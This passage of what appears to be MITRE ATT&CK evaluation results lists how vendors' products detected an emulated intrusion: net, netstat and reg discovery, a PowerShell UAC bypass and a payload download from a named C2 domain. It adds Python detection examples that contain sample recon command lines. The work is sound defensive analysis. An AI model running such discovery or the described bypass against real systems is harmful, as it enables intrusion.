Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched net.exe with a related ATT&CK Technique (T1069 - Permission Groups Discovery) and the correct Tactic (Discovery). The enrichment was tainted by a parent alert. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments (tainted by parent alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1018 - Remote System Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
General Behavior
A General Behavior alert was generated showing that a spawned process (net) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed powershell.exe executing net.exe with command-line arguments and enriched the command with the condition Net User Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3]
McAfee
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Technique (Remote System Discovery) and a suspicious indicator that the net utility obtained information about domain computers and controllers. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". The alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed execution of net.exe with command-line arguments (tainted by parent PowerShell malicious cmdlet alert). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment (Tainted)
The capability enriched the execution of net.exe and net1.exe as an enumeration command. The data was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8]
RSA
Telemetry
Telemetry showed execution of net.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of net.exe with command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4]
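The entries above repeat one pattern for every vendor: net.exe (and the net1.exe it spawns) running under powershell.exe, enriched with a Discovery technique and marked tainted when an ancestor process already carries an alert. The Python below is an added example, not part of the evaluation or of any vendor's capability; it implements that enrichment and taint propagation over a constructed process tree, mapping each net subcommand to the technique the entries name for it, with the net group special case for computer/controller groups (4.A.1) being an assumption drawn from those entries.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (constructed sample, not vendor telemetry)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Technique attached to each net subcommand, using the names the evaluation
# entries give for the net group / localgroup / user / use procedures.
SUBCOMMAND_TECHNIQUES = {
    "group": ("T1069", "Permission Groups Discovery"),
    "localgroup": ("T1069", "Permission Groups Discovery"),
    "user": ("T1087", "Account Discovery"),
    "use": ("T1049", "System Network Connections Discovery"),
}
# Assumption: a "net group" query that names computer or controller groups is
# what the 4.A.1 entries label Remote System Discovery instead of T1069.
REMOTE_SYSTEM_GROUP_WORDS = ("computers", "controllers")
NET_IMAGES = {"net", "net.exe", "net1.exe"}


def tokenize(cmdline):
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def classify_net_command(cmdline):
    """Return the ATT&CK enrichment for a net/net1 command line, or None."""
    argv = tokenize(cmdline)
    if not argv:
        return None
    image = argv[0].rsplit("\\", 1)[-1].lower()
    if image not in NET_IMAGES or len(argv) < 2:
        return None
    sub = argv[1].lower()
    args = [a.lower() for a in argv[2:]]
    technique = SUBCOMMAND_TECHNIQUES.get(sub)
    if technique is None:
        return None
    if sub == "group" and any(w in " ".join(args) for w in REMOTE_SYSTEM_GROUP_WORDS):
        technique = ("T1018", "Remote System Discovery")
    return {"subcommand": sub, "technique": technique, "tactic": "Discovery"}


def taint_sources(event, by_pid, alerted_pids):
    """Walk the ancestry; each ancestor that already carries an alert taints this event."""
    sources, seen = [], set()
    cur = by_pid.get(event.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        if cur.pid in alerted_pids:
            sources.append(cur.image)
        cur = by_pid.get(cur.ppid)
    return sources


def enrich(events, alerted_pids):
    """Produce Enrichment records for every net/net1 event, tainted or not."""
    by_pid = {e.pid: e for e in events}
    detections = []
    for e in events:
        info = classify_net_command(e.cmdline)
        if info is None:
            continue
        taint = taint_sources(e, by_pid, alerted_pids)
        parent = by_pid.get(e.ppid)
        detections.append({
            "pid": e.pid,
            "parent": parent.image if parent else None,
            "subcommand": info["subcommand"],
            "technique": info["technique"],
            "tactic": info["tactic"],
            "category": "Enrichment (Tainted)" if taint else "Enrichment",
            "tainted_by": taint,
        })
    return detections


# Constructed process tree: wscript.exe -> powershell.exe -> net.exe (-> net1.exe),
# plus an unrelated net.exe under explorer.exe with no alerted ancestor.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "wscript.exe", r"wscript.exe C:\Users\bob\update.vbs"),
    ProcEvent(200, 100, "powershell.exe", "powershell.exe -NoProfile"),
    ProcEvent(300, 200, "net.exe", r'C:\Windows\System32\net.exe group "Domain Admins" /domain'),
    ProcEvent(301, 300, "net1.exe", r'C:\Windows\System32\net1.exe group "Domain Admins" /domain'),
    ProcEvent(310, 200, "net.exe", "net localgroup administrators"),
    ProcEvent(320, 200, "net.exe", "net user /domain"),
    ProcEvent(330, 200, "net.exe", "net use"),
    ProcEvent(340, 200, "net.exe", r'net group "Domain Controllers" /domain'),
    ProcEvent(2, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(400, 2, "net.exe", r"net use Z: \\fileserver\share"),
]
ALERTED_PIDS = {100, 200}  # earlier alerts on wscript.exe and powershell.exe

if __name__ == "__main__":
    for det in enrich(SAMPLE_EVENTS, ALERTED_PIDS):
        print(det)
```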
Carbon Black
Telemetry
The vendor demonstrated to MITRE that the capability can provide telemetry of net.exe, but no screenshot was captured for this procedure. [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery). [1] [2] [3] [4] [5] [6] [7]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net use was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (System Network Connections Discovery). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Endgame
Telemetry (Tainted)
Telemetry showed execution of net.exe with command-line arguments (tainted by parent alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Specific Behavior (Tainted)
A Specific Behavior alert was triggered for enumerating Windows network admin shares as part of Discovery (tainted by parent alert). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment (Delayed, Tainted)
The capability enriched net.exe with the correct ATT&CK Technique (T1049 - System Network Connections Discovery), a related ATT&CK Technique (Remote System Discovery), and the correct Tactic (Discovery). The enrichment was tainted by a parent alert. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed execution of net.exe with command-line arguments (tainted by the parent Script File Created alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6]
Microsoft
Telemetry (Tainted)
Telemetry showed execution of net.exe with command-line arguments (tainted by parent PowerShell malicious cmdlet alert). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5]
RSA
Telemetry
Telemetry showed execution of net.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of net.exe with command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4]
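The "Tainted" modifier used throughout these results means a piece of telemetry inherits suspicion from an earlier detection on an ancestor process (here a powershell.exe or wscript.exe alert), or, in SentinelOne's case, from membership in the same story (Group ID). The Python below is an added illustration of that propagation over a process tree; it is not code from MITRE or from any evaluated vendor. The process records, PIDs and command lines are constructed, and the alert names ("Script File Created", "Malicious use of PowerShell") are borrowed from the vendor notes above only as labels.

```python
from dataclasses import dataclass
from typing import Dict, Iterator, List, Optional, Tuple


@dataclass
class ProcEvent:
    """One process-creation record from EDR telemetry (constructed)."""
    pid: int
    ppid: int
    image: str
    cmdline: str
    alert: Optional[str] = None  # detection raised directly on this process, if any


# Constructed telemetry mirroring the chain in these results:
# wscript.exe (alert) -> powershell.exe (alert) -> net.exe / netstat.exe / reg.exe
EVENTS: List[ProcEvent] = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "wscript.exe", 'wscript.exe "update.vbs"', alert="Script File Created"),
    ProcEvent(300, 200, "powershell.exe", "powershell.exe -NoP -W Hidden", alert="Malicious use of PowerShell"),
    ProcEvent(400, 300, "net.exe", "net use"),
    ProcEvent(401, 300, "netstat.exe", "netstat -ano"),
    ProcEvent(402, 300, "reg.exe", "reg query HKLM\\SOFTWARE"),
    ProcEvent(500, 100, "notepad.exe", "notepad.exe"),  # unrelated sibling: must stay untainted
]


def ancestors(events: List[ProcEvent], pid: int) -> Iterator[ProcEvent]:
    """Walk up the tree from pid, nearest parent first; stops at the root or on a cycle."""
    by_pid = {e.pid: e for e in events}
    seen = {pid}
    cur = by_pid.get(pid)
    while cur is not None and cur.ppid in by_pid and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = by_pid[cur.ppid]
        yield cur


def taint_source(events: List[ProcEvent], pid: int) -> Optional[Tuple[str, str]]:
    """Return (image, alert) of the nearest alerted ancestor, or None if untainted.

    A process carrying its own alert is a detection in its own right; "tainted"
    describes telemetry that merely inherits suspicion from a parent alert.
    """
    for anc in ancestors(events, pid):
        if anc.alert:
            return anc.image, anc.alert
    return None


def classify(events: List[ProcEvent]) -> Dict[int, str]:
    """Label each record the way the evaluation's detection notes do."""
    labels: Dict[int, str] = {}
    for e in events:
        if e.alert:
            labels[e.pid] = f"Alert: {e.alert}"
        else:
            src = taint_source(events, e.pid)
            labels[e.pid] = (f"Telemetry (Tainted by {src[0]} '{src[1]}')"
                             if src else "Telemetry")
    return labels


if __name__ == "__main__":
    for pid, label in classify(EVENTS).items():
        print(pid, label)
```

The walk stops at the nearest alerted ancestor, which is why net.exe reads as tainted by powershell.exe even though wscript.exe further up also carried an alert; the sibling notepad.exe under explorer.exe stays plain telemetry because no alert lies on its path to the root.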
Carbon Black
Enrichment
The capability enriched net.exe data with the correct ATT&CK Technique (T1049 - System Network Connections Discovery). [1] [2] [3] [4] [5] [6] [7]
Telemetry
Telemetry showed a process tree containing netstat.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because netstat was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed netstat.exe executing with command-line arguments. The process tree view showed netstat.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7]
Cybereason
Enrichment (Tainted)
The capability enriched the netstat.exe execution with a Reconnaissance tag and the correct ATT&CK Technique (System Network Connections Discovery). The data was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed netstat.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched netstat.exe data with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery) (tainted by parent alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry showed execution of netstat.exe with command-line arguments (tainted by parent alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified netstat.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched netstat.exe with an alert for Netstat Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (netstat) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed powershell.exe executing netstat.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed execution of netstat.exe with command-line arguments (tainted by the parent Script File Created alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Enrichment
The capability enriched netstat.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Network Connections Discovery) and a suspicious indicator that the network protocol statistics were gathered. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed powershell.exe executing netstat.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6]
Microsoft
Telemetry (Tainted)
Telemetry showed execution of netstat.exe (tainted by parent PowerShell malicious cmdlet alert). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing netstat with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5]
RSA
None
No detection capability demonstrated for this procedure due to event suppression (previously detected). [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of netstat.exe with command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Enrichment
The capability enriched reg.exe data with the correct ATT&CK Technique (Query Registry). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed a process tree containing reg.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because reg query was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The process tree view showed reg.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert identifying reg.exe execution as suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched reg.exe with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery) (tainted by parent alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry showed execution of reg.exe with command-line arguments (tainted by parent alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
Enrichment
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified reg.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Enrichment
The capability enriched reg.exe indicating that a sensitive registry key was accessed for potential reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed powershell.exe executing reg.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Telemetry (Tainted)
Telemetry showed execution of reg.exe with command-line arguments (tainted by the parent Script File Created alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched reg.exe with the correct ATT&CK Tactic (Discovery) and Technique (Query Registry) and a suspicious indicator that the reg.exe utility queried the Registry. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry (Tainted)
Telemetry showed execution of reg.exe with command-line arguments (tainted by suspicious sequence of exploration activities alert). [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Enrichment
The capability enriched reg.exe executing with command-line arguments with the correct ATT&CK Technique (Query Registry). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
RSA
Telemetry
Telemetry showed execution of reg.exe with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of reg.exe with command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior was observed because a base64 obfuscated PowerShell command was used to invoke UAC bypass. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Telemetry
Telemetry showed an integrity level change through a query for powershell.exe processes of high integrity (12288/0x3000) that were created by medium integrity processes (8192/0x2000), which is indicative of bypassing UAC. Telemetry also showed the Invoke-BypassUACTokenManipulation function in the script. [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed an integrity level change from medium to high for powershell.exe, which is indicative of a UAC bypass. The telemetry was tainted by a parent Malicious use of PowerShell alert. [1] [2] [3] [4] [5]
Endgame
Telemetry
Telemetry showed a mismatch between the logon id (authentication id) of parent (powershell.exe - 312288) and child (powershell.exe - 10184789) processes indicating that a different token was used. Though no screenshot for this data is available, this information can be used to trace back to the logon event for that logon id to display the process integrity level indicative of the elevated token used for bypass UAC. [1] [2] [3]
FireEye
Telemetry (Configuration Change)
Telemetry showed execution of powershell.exe as a high integrity process as SYSTEM with a token logon ID previously associated with user Bob, which indicates UAC bypassing. A Configuration Change was made in order to collect Windows Event Logs for events 4627 (Group Membership Information) and 4673 (A privileged service was called). [1] [2] [3] [4]
F-Secure
Telemetry
Telemetry showed an elevated PowerShell spawned under the context of user Bob from an unelevated parent process. [1] [2] [3]
General Behavior
A General Behavior alert was generated for a possible PowerShell privilege escalation based on the elevation of a child process from a non-elevated parent. [1] [2] [3]
GoSecure
None
No detection capability demonstrated for this procedure, though an alert called "PowerShell executed encoded commands" triggered due to svchost.exe creating powershell.exe with the -enc command-line argument. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Telemetry
Telemetry showed an integrity level change from medium (2) to high (3) for powershell.exe, which is indicative of a UAC bypass. [1] [2] [3]
Specific Behavior
A Specific Behavior alert was generated for a possible UAC bypass. The alert was tagged with the correct ATT&CK Technique (Bypass User Account Control) and Tactics (Defense Evasion, Privilege Escalation). [1] [2] [3]
Microsoft
Telemetry (Tainted)
Telemetry showed execution of powershell.exe executing "Invoke-BypassUACTokenManipulation" Empire cmdlet under the context of user Bob with medium integrity level, execution of svchost.exe with seclogon flag to use impersonation service with new high integrity powershell.exe process as SYSTEM, and subsequent context adjustment of powershell.exe to user Bob (tainted by the parent alert for suspicious sequence of exploration activities). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry
Telemetry showed a process integrity level change from parent powershell.exe (medium / 8192) to child powershell.exe (high / 12288). [1] [2] [3] [4]
Indicator of Compromise
An Indicator of Compromise alert was generated identifying a PowerShell Empire script performing the bypass UAC attack. [1] [2] [3] [4]
RSA
None
No detection capability demonstrated for this procedure. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed process integrity levels changing from medium to high (tainted by parent alert). Integrity level numbers are based upon how the capability tracks integrity levels and not how Windows tracks them causing a difference in values. [1]
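The vendor notes for this procedure describe two telemetry signals: a powershell.exe child at high integrity (12288/0x3000) created by a medium-integrity parent (8192/0x2000) (CrowdStrike, Cybereason, McAfee, Palo Alto Networks), and a child whose token logon ID differs from its parent's (Endgame, FireEye). The Python below is an added example of running both checks over process-creation records; it is not MITRE's or any vendor's code. The records, PIDs and logon IDs are constructed, and the parent/child pairing follows the CrowdStrike and Palo Alto Networks view of the tree; sensors that attribute the creation to svchost.exe (seclogon), as the Microsoft and GoSecure notes do, would need the check run against the requesting process rather than the recorded parent. Caveat: a consent-prompted elevation of an administrator's split token can produce both signals too (the elevated half of the token has its own logon ID), so they are corroborating context for the script evidence the vendors cite (Invoke-BypassUACTokenManipulation), not a verdict on their own.

```python
from dataclasses import dataclass
from typing import Dict, List

# Windows mandatory integrity level RIDs, as quoted in the results above.
MEDIUM = 0x2000  # 8192
HIGH = 0x3000    # 12288


@dataclass
class ProcStart:
    """One process-creation record (constructed)."""
    pid: int
    ppid: int
    image: str
    user: str
    integrity: int
    logon_id: int  # authentication ID of the process token
    cmdline: str = ""


# Constructed records: a medium-integrity powershell.exe under Bob spawns a
# high-integrity powershell.exe whose token carries a different logon ID.
EVENTS: List[ProcStart] = [
    ProcStart(1000, 800, "explorer.exe", "Bob", MEDIUM, 0x4C4F0),
    ProcStart(1100, 1000, "powershell.exe", "Bob", MEDIUM, 0x4C4F0, "powershell.exe -NoP -W Hidden"),
    ProcStart(1200, 1100, "powershell.exe", "Bob", HIGH, 0x9B6E5, "powershell.exe -NoP -W Hidden"),
    ProcStart(1300, 1000, "cmd.exe", "Bob", MEDIUM, 0x4C4F0, "cmd.exe"),
]


def level_name(rid: int) -> str:
    """Render an integrity RID the way the results quote it, e.g. 'high (12288/0x3000)'."""
    names = {0x1000: "low", MEDIUM: "medium", HIGH: "high", 0x4000: "system"}
    return f"{names.get(rid, 'unknown')} ({rid}/{rid:#x})"


def elevation_findings(events: List[ProcStart]) -> List[Dict[str, object]]:
    """Return parent->child pairs showing integrity elevation and/or a logon-ID swap.

    Signal 1: parent at medium (or lower) integrity, child at high or above.
    Signal 2: same account name but a different logon ID, i.e. the child was
              started with a token that did not come from the parent's session.
    Both can also occur for a consent-prompted elevation, so treat them as
    triage context to pair with command-line/script evidence.
    """
    by_pid = {e.pid: e for e in events}
    findings: List[Dict[str, object]] = []
    for child in events:
        parent = by_pid.get(child.ppid)
        if parent is None:
            continue
        reasons = []
        if parent.integrity <= MEDIUM < child.integrity:
            reasons.append(f"integrity {level_name(parent.integrity)} -> {level_name(child.integrity)}")
        if child.user == parent.user and child.logon_id != parent.logon_id:
            reasons.append(f"logon id {parent.logon_id:#x} -> {child.logon_id:#x}")
        if reasons:
            findings.append({"parent_pid": parent.pid, "child_pid": child.pid,
                             "image": child.image, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in elevation_findings(EVENTS):
        print(f)
```

Run against the constructed records, only the 1100 -> 1200 powershell.exe edge is reported, with both reasons attached; the cmd.exe child at the same level and logon ID as its parent produces nothing.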
Carbon Black
Telemetry
The vendor demonstrated to MITRE that the capability can provide telemetry of network connections and file modifications indicating a Remote File Copy, but no screenshot was captured for this procedure. [1] [2] [3] [4]
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because PowerShell retrieved the file wdbypass from www.freegoogleadsenseinfo.com (C2 domain) over port 8080. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Specific Behavior (Tainted)
A Specific Behavior alert was generated based on the downloading and execution of wdbypass, identified as Fileless malware, from freegoogleadsenseinfo.com (C2 domain) over port 8080. The alert also showed decoded PowerShell commands extracted from the command-line arguments showing a connection over port 8080 with an HTTP request to download the wdbypass payload. The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7]
Endgame
Telemetry
Telemetry showed the decoded PowerShell extracted from the command-line arguments, which revealed a connection over port 8080 with an HTTP request to download the wdbypass payload. [1] [2] [3] [4]
FireEye
Enrichment
The capability enriched an HTTP GET request for wdbypass with an alert for PowerShell URL Request (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactic (Command and Control). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Telemetry
Telemetry showed powershell.exe making an HTTP GET request over port 8080 to freegoogleadsenseinfo.com (C2 domain) for the file wdbypass. [1] [2] [3] [4] [5] [6]
Specific Behavior
A Specific Behavior alert was generated for PowerShell downloading a significant amount of data using HTTP(S). [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe making an HTTP GET request over port 8080 to freegoogleadsenseinfo.com (C2 domain) for the file wdbypass (tainted by the parent "Powershell executed encoded commands" alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
None
